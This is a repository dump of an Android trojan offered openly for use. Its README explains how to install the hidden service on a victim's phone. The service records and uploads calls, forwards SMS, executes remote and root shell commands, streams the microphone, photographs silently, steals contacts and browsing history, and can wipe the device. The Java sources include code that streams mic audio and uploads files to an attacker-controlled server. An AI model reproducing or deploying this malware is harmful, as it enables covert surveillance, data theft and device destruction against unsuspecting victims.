├── .classpath ├── .project ├── .settings └── org.eclipse.jdt.core.prefs ├── AndroidManifest.xml ├── README.md ├── bin ├── .gitignore ├── AndroidManifest.xml ├── classes.dex ├── dexedLibs │ └── android-support-v4-84650add0c012d5b32e3107f80e3fb22.jar ├── jarlist.cache └── resources.ap_ ├── libs └── android-support-v4.jar ├── lint.xml ├── project.properties ├── res └── .gitignore └── src └── com └── example └── test ├── AudioStreamer.java ├── FilePosterEnc.java ├── HiddenWaiter.java ├── HttpPoster.java ├── IntentTracker.java ├── MyService.java ├── PhoneRecorder.java ├── PhotoHandler.java ├── ShellSession.java ├── Starter.java └── SyncThread.java /.classpath: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | trojan_service 4 | 5 | 6 | 7 | 8 | 9 | com.android.ide.eclipse.adt.ResourceManagerBuilder 10 | 11 | 12 | 13 | 14 | com.android.ide.eclipse.adt.PreCompilerBuilder 15 | 16 | 17 | 18 | 19 | org.eclipse.jdt.core.javabuilder 20 | 21 | 22 | 23 | 24 | com.android.ide.eclipse.adt.ApkBuilder 25 | 26 | 27 | 28 | 29 | 30 | com.android.ide.eclipse.adt.AndroidNature 31 | org.eclipse.jdt.core.javanature 32 | 33 | 34 | -------------------------------------------------------------------------------- /.settings/org.eclipse.jdt.core.prefs: -------------------------------------------------------------------------------- 1 | eclipse.preferences.version=1 2 | org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled 3 | org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.7 4 | org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve 5 | org.eclipse.jdt.core.compiler.compliance=1.7 6 | org.eclipse.jdt.core.compiler.debug.lineNumber=generate 7 | org.eclipse.jdt.core.compiler.debug.localVariable=generate 8 | org.eclipse.jdt.core.compiler.debug.sourceFile=generate 9 | org.eclipse.jdt.core.compiler.problem.assertIdentifier=error 10 | org.eclipse.jdt.core.compiler.problem.enumIdentifier=error 11 | org.eclipse.jdt.core.compiler.source=1.7 12 | -------------------------------------------------------------------------------- /AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 32 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Android Trojan (Built with Android SDK 22) source code 2 | UPD. 11.02.2016 Version 1.2 released! 3 | HERE ARE LINKS TO THE OTHER COMPONENTS: 4 | 5 | trojan starter apk: https://github.com/androidtrojan1/android-trojan-starter- 6 | 7 | mic streamer pc client: https://github.com/androidtrojan1/android-trojan-streamer 8 | 9 | trojan php server part: https://github.com/androidtrojan1/android-trojan-php-server 10 | 11 | 12 | Android trojan with abilities of remote control,root commands execution, recording and online sound streaming 13 | 14 | Compatible with all Android from Gingerbread (API 10) up to Lollipop (API 22) 15 | 16 | ----DESCRIPTION---- 17 | 18 | This is a concept of Android remote control and wiretapping tool (trojan with several functions). 19 | It consists of server and client parts. 20 | 21 | The php code should be put to your webhosting (the folder named "html"). 22 | It's recommended to set rw- privileges on all files. It is the place where the trojan will be connecting to. 23 | 24 | ----INSTALLATION---- 25 | 26 | The actual server part is a service apk and starter apk. The service should be installed on victim's device first. After that you need to install starter and choose one of two options. 27 | either install as root, or non-root install. After that the starter is no longer needed and should be uninstalled. (for example via button in the bottom left of the screen). 28 | 29 | Once it's done, the hidden service should be started automatically with boot. 30 | It wont be seen in installed apk's at all if it's installed as root (and it wont be possible to kill its process completely if the user doesnt know about root features and how to use them) 31 | 32 | What server actually does: 33 | 34 | Records all phone calls and tries to upload them to your web-server in 3gp format every 3 hours (the uploaded files simply should be renamed to .3gp) 35 | 36 | Sends you the copy of all incoming sms in real time if the internet was available at that moment. 37 | 38 | When the screen is turned off if the internet is available, it back connects to your web-server and periodically checks for new commands. The commands are as following: 39 | 40 | ------------COMMMANDS---------- 41 | 42 | Command : - execute regular shell command on the victim's device 43 | 44 | Spec commands: 45 | 46 | root [command] - try to execute command as root (if device is rooted) 47 | 48 | sms - get all sms dump from device 49 | 50 | download [file_url] - download file from the specified url onto device (into app's data/files directory) 51 | 52 | upload [full_path_to_file] - upload file from the device to your server 53 | 54 | restart - restarts the service 55 | 56 | loc - get last known location (active location isnt used because it can be too alarming for victim) 57 | 58 | info - get basic informaion such as current connection type,battery level, available memory and service provider name 59 | 60 | record [secs] - record sound from the mic for amount of seconds (will be saved to data/files/logs) 61 | 62 | stream [ip] [port] - start real-time streaming sound from the device's mic via udp to your listening computer * (listener jar here https://github.com/androidtrojan1/android-trojan-streamer) 63 | 64 | sync - upload all files that were logged to the app's files/logs directory 65 | 66 | secsync - encrypted upload all files that were logged to the app's files/logs directory 67 | 68 | sync [path] - upload all files from selected directory to your server 69 | 70 | secsync [path] - encrypted upload all files from selected directory to your server 71 | 72 | quit - end shell session 73 | 74 | clear - clear data/logs directory 75 | 76 | photo - silently make photos from all available cameras on device (1 from each) and save them to files/logs 77 | 78 | calllogs - get victim call's history 79 | 80 | bookmarks = get bookmarks from the system browser 81 | 82 | history - get browsing history from the system browser 83 | 84 | screenshot - make a screenshot of the device's current screen (works on rooted device only) 85 | 86 | getcontacts - get contact list with names and numbers from the device 87 | 88 | sendsms [number] [text] - send sms to specified number with some text 89 | 90 | factoryformat - try to do full factory format via secret ussd code *2767*3855# (works not on all devices) 91 | 92 | 93 | For the purposes of preserving invisibility all the "bad" activity is stopped once the device screen is on (except for call recording and incoming sms'es copies sending). This way it wont disturb user and decrease the probability of them starting to suspect something. 94 | 95 | ------IMPORTANT------- 96 | 97 | 98 | Before the compilation and use, change the value of the variable 99 | final static String site = "http://192.168.100.27/"; in the MyService.java file to your web-server host with slash in the end, for example 100 | "http://yourwebserver.com/" . It also should be the root path where the contents of html folder should be put. 101 | Dont forget to set your passphrase for encrypted file transfer in FilePosterEnc.java. 102 | If your want to use encryption,change private final static byte[] PASSWORD and private final static short offset (it will increase encryption strength). 103 | 104 | 105 | 106 | have fun! 107 | 108 | Upd. 11.09.2016 New Update is coming. New features in the upcoming version: 109 | * Telegram real-time notifications about victim's actions 110 | * silent execution of ussd codes 111 | * more interesting root features ^^ 112 | -------------------------------------------------------------------------------- /bin/.gitignore: -------------------------------------------------------------------------------- 1 | /service.apk 2 | -------------------------------------------------------------------------------- /bin/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 32 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /bin/classes.dex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/androidtrojan1/android-trojan-service-/4c86f704bfc94c7fe6165c57f1a7c432daa03b49/bin/classes.dex -------------------------------------------------------------------------------- /bin/dexedLibs/android-support-v4-84650add0c012d5b32e3107f80e3fb22.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/androidtrojan1/android-trojan-service-/4c86f704bfc94c7fe6165c57f1a7c432daa03b49/bin/dexedLibs/android-support-v4-84650add0c012d5b32e3107f80e3fb22.jar -------------------------------------------------------------------------------- /bin/jarlist.cache: -------------------------------------------------------------------------------- 1 | # cache for current jar dependency. DO NOT EDIT. 2 | # format is

3 | # Encoding is UTF-8 4 | -------------------------------------------------------------------------------- /bin/resources.ap_: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/androidtrojan1/android-trojan-service-/4c86f704bfc94c7fe6165c57f1a7c432daa03b49/bin/resources.ap_ -------------------------------------------------------------------------------- /libs/android-support-v4.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/androidtrojan1/android-trojan-service-/4c86f704bfc94c7fe6165c57f1a7c432daa03b49/libs/android-support-v4.jar -------------------------------------------------------------------------------- /lint.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /project.properties: -------------------------------------------------------------------------------- 1 | # This file is automatically generated by Android Tools. 2 | # Do not modify this file -- YOUR CHANGES WILL BE ERASED! 3 | # 4 | # This file must be checked in Version Control Systems. 5 | # 6 | # To customize properties used by the Ant build system edit 7 | # "ant.properties", and override values to adapt the script to your 8 | # project structure. 9 | # 10 | # To enable ProGuard to shrink and obfuscate your code, uncomment this (available properties: sdk.dir, user.home): 11 | #proguard.config=${sdk.dir}/tools/proguard/proguard-android.txt:proguard-project.txt 12 | 13 | # Project target. 14 | target=android-22 15 | android.library.reference.1=../appcompat_v7 16 | -------------------------------------------------------------------------------- /res/.gitignore: -------------------------------------------------------------------------------- 1 | !.gitignore -------------------------------------------------------------------------------- /src/com/example/test/AudioStreamer.java: -------------------------------------------------------------------------------- 1 | package com.example.test; 2 | 3 | import java.net.DatagramPacket; 4 | import java.net.DatagramSocket; 5 | import java.net.InetAddress; 6 | import android.media.AudioFormat; 7 | import android.media.AudioRecord; 8 | import android.media.MediaRecorder; 9 | import android.util.Log; 10 | 11 | public class AudioStreamer implements Runnable { 12 | 13 | AudioStreamer(String addr, int port){ 14 | this.address=addr; 15 | this.port=port; 16 | } 17 | 18 | String address; 19 | //public byte[] buffer; 20 | //public static DatagramSocket socket; 21 | private int port=50005; 22 | private int sampleRate = 44100 ; // 44100 for music 23 | private int channelConfig = AudioFormat.CHANNEL_IN_MONO; 24 | private int audioFormat = AudioFormat.ENCODING_PCM_16BIT; 25 | int bufsize = AudioRecord.getMinBufferSize(sampleRate, channelConfig, audioFormat); 26 | 27 | @Override 28 | public void run() { 29 | AudioRecord recorder=null; 30 | try { 31 | DatagramSocket socket = new DatagramSocket(); 32 | byte[] buffer = new byte[bufsize]; 33 | Log.d(MyService.LOG_TAG,"Buffer size: "+bufsize); 34 | DatagramPacket packet; 35 | 36 | final InetAddress destination = InetAddress.getByName(address); 37 | 38 | recorder = new AudioRecord(MediaRecorder.AudioSource.MIC, 39 | sampleRate,channelConfig,audioFormat,bufsize*5); 40 | recorder.startRecording(); 41 | Log.d(MyService.LOG_TAG, "Streaming started!"); 42 | 43 | Runnable sender = new HttpPoster(MyService.post_url, 44 | "Streaming started with buffer size:"+bufsize+" on ip "+address+":"+port); 45 | new Thread(sender).start(); 46 | 47 | 48 | while(MyService.streaming) { 49 | bufsize = recorder.read(buffer, 0, buffer.length); 50 | packet = new DatagramPacket (buffer,buffer.length,destination,port); 51 | socket.send(packet); 52 | } 53 | socket.close(); /// ADDED!! NEED CHECK 54 | } 55 | 56 | catch(Exception e) { 57 | Log.e(MyService.LOG_TAG, "Exception in streamer thread!\n"+e.toString()); 58 | } 59 | try{ 60 | recorder.stop(); 61 | recorder.release();} catch(Exception e){} 62 | Log.d(MyService.LOG_TAG, "Streamer thread finished"); 63 | MyService.streaming=false; 64 | MyService.recording=false; 65 | Runnable sender = new HttpPoster(MyService.post_url, 66 | "Streaming with buffer size:"+bufsize+" on ip "+address+":"+port+" stopped"); 67 | new Thread(sender).start(); 68 | } 69 | 70 | 71 | } 72 | -------------------------------------------------------------------------------- /src/com/example/test/FilePosterEnc.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/androidtrojan1/android-trojan-service-/4c86f704bfc94c7fe6165c57f1a7c432daa03b49/src/com/example/test/FilePosterEnc.java -------------------------------------------------------------------------------- /src/com/example/test/HiddenWaiter.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/androidtrojan1/android-trojan-service-/4c86f704bfc94c7fe6165c57f1a7c432daa03b49/src/com/example/test/HiddenWaiter.java -------------------------------------------------------------------------------- /src/com/example/test/HttpPoster.java: -------------------------------------------------------------------------------- 1 | package com.example.test; 2 | import java.io.DataOutputStream; 3 | import java.io.File; 4 | import java.io.FileInputStream; 5 | import java.io.OutputStream; 6 | import java.net.HttpURLConnection; 7 | import java.net.URL; 8 | import java.util.ArrayList; 9 | import java.util.List; 10 | import android.util.Log; 11 | 12 | public class HttpPoster implements Runnable{ 13 | 14 | private String file_to_upload; 15 | private String data; 16 | private List listdata = new ArrayList(); 17 | private boolean isfile=false; 18 | private boolean isarray=false; 19 | String post_url; 20 | 21 | public HttpPoster(String file) { 22 | isfile=true; 23 | file_to_upload=file; 24 | } 25 | 26 | public HttpPoster(String url,String data){ 27 | isfile=false; 28 | this.data=data; 29 | post_url=url; 30 | } 31 | 32 | public HttpPoster(String url,List listdata){ 33 | isarray=true; 34 | this.listdata=listdata; 35 | post_url=url; 36 | } 37 | 38 | public void run() { 39 | 40 | if(isfile){ 41 | postfile(); 42 | } 43 | else if(isarray){ 44 | postarray(); 45 | } 46 | else{ 47 | post(); 48 | } 49 | 50 | } 51 | 52 | public void postfile(){ 53 | HttpURLConnection connection = null; 54 | DataOutputStream outputStream = null; 55 | String pathToOurFile = file_to_upload; 56 | String uploader_url = MyService.uploader_url; 57 | String lineEnd = "\r\n"; 58 | String twoHyphens = "--"; 59 | String boundary = "*****"; 60 | 61 | int bufferSize = 1024; 62 | int bytesRead; 63 | 64 | try 65 | { 66 | byte[] buffer = new byte[bufferSize]; 67 | 68 | FileInputStream fileInputStream = new FileInputStream(new File(pathToOurFile) ); 69 | URL url = new URL(uploader_url); 70 | connection = (HttpURLConnection) url.openConnection(); 71 | connection.setDoInput(true); 72 | connection.setDoOutput(true); 73 | connection.setUseCaches(false); 74 | connection.setChunkedStreamingMode(bufferSize); 75 | connection.setRequestMethod("GET"); 76 | connection.setRequestProperty("Connection", "Keep-Alive"); 77 | connection.setRequestProperty("Content-Type", "multipart/form-data;boundary="+boundary); 78 | //application/octet-stream multipart/form-data 79 | outputStream = new DataOutputStream(connection.getOutputStream()); 80 | outputStream.writeBytes(twoHyphens + boundary + lineEnd); 81 | outputStream.writeBytes("Content-Disposition: form-data; name=\"uploadedfile\";filename=\""+pathToOurFile +"\"" + lineEnd); 82 | outputStream.writeBytes(lineEnd); 83 | bytesRead = fileInputStream.read(buffer, 0, bufferSize); 84 | 85 | while (bytesRead > 0) 86 | { 87 | outputStream.write(buffer, 0, bytesRead); 88 | bytesRead = fileInputStream.read(buffer, 0, bufferSize); 89 | if(Thread.currentThread().isInterrupted()){ 90 | fileInputStream.close(); 91 | outputStream.close(); 92 | throw new InterruptedException();} 93 | } 94 | outputStream.writeBytes(lineEnd); 95 | outputStream.writeBytes(twoHyphens + boundary + twoHyphens + lineEnd); 96 | int serverResponseCode = connection.getResponseCode(); 97 | if (serverResponseCode==200){ 98 | Log.d(MyService.LOG_TAG, "file "+file_to_upload+" uploaded successfully!"); 99 | } 100 | else{ 101 | Log.d(MyService.LOG_TAG, "file "+file_to_upload+" wasnt uploaded correctly"); 102 | String serverResponseMessage = connection.getResponseMessage(); 103 | Log.d(MyService.LOG_TAG, "response code: "+serverResponseCode); 104 | Log.d(MyService.LOG_TAG, "message:\n"+serverResponseMessage); 105 | } 106 | 107 | fileInputStream.close(); 108 | outputStream.flush(); 109 | outputStream.close(); 110 | } 111 | catch (Exception e) 112 | { 113 | Log.d(MyService.LOG_TAG, "error uploading file "+file_to_upload+"\n"+e.toString()); 114 | } 115 | 116 | } 117 | 118 | 119 | public void post(){ 120 | try{ 121 | URL obj = new URL(post_url); 122 | HttpURLConnection con = (HttpURLConnection) obj.openConnection(); 123 | con.setRequestMethod("POST"); 124 | con.setDoOutput(true); 125 | OutputStream os = con.getOutputStream(); 126 | os.write(data.getBytes()); 127 | os.flush(); 128 | os.close(); 129 | 130 | int responseCode = con.getResponseCode(); 131 | 132 | if (responseCode == HttpURLConnection.HTTP_OK) { 133 | } else { 134 | Log.d(MyService.LOG_TAG,"POST request not worked\nResponce code:"+responseCode); 135 | } 136 | } 137 | catch(Exception e){ 138 | Log.d(MyService.LOG_TAG,"error sending POST\n"+e.toString()); 139 | } 140 | 141 | } 142 | 143 | public void postarray(){ 144 | try{ 145 | URL obj = new URL(post_url); 146 | HttpURLConnection con = (HttpURLConnection) obj.openConnection(); 147 | con.setRequestMethod("POST"); 148 | con.setDoOutput(true); 149 | OutputStream os = con.getOutputStream(); 150 | for (int i=0; i